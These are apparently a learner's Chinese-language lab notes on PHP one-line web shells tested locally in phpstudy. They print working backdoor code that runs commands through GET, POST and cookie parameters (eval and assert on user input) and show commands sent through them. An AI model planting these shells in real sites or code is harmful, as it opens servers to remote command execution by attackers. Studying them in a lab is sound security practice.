环境:phpstudy
目录
GET型
使用get型一句话木马执行参数pass
php代码使用;结尾
<?php eval($_GET[pass]);?>无相应代表被正确解析
输入pass参数
这里还发现system(ls)无法使用?可能是权限不够。
也可以使用?pass=system(ipconfig);
发现并无作用,所以只是调用cmd进行一些命令执行结果,但是无法对主机实施操控
POST型
<?php eval($_POST[pass]);?> post传参,bp抓包修改传参
或者使用hackbar进行post传参
Cookie型
cookie.php获取
<?php @$a=$_COOKIE[1];$b='';$c='';@assert($b.$a);?>其中,1相当于一个参数
我改变了参数,使用pass参数,post方法传递命令
发现Cookie但是不能直接传递php命令
get型也可以
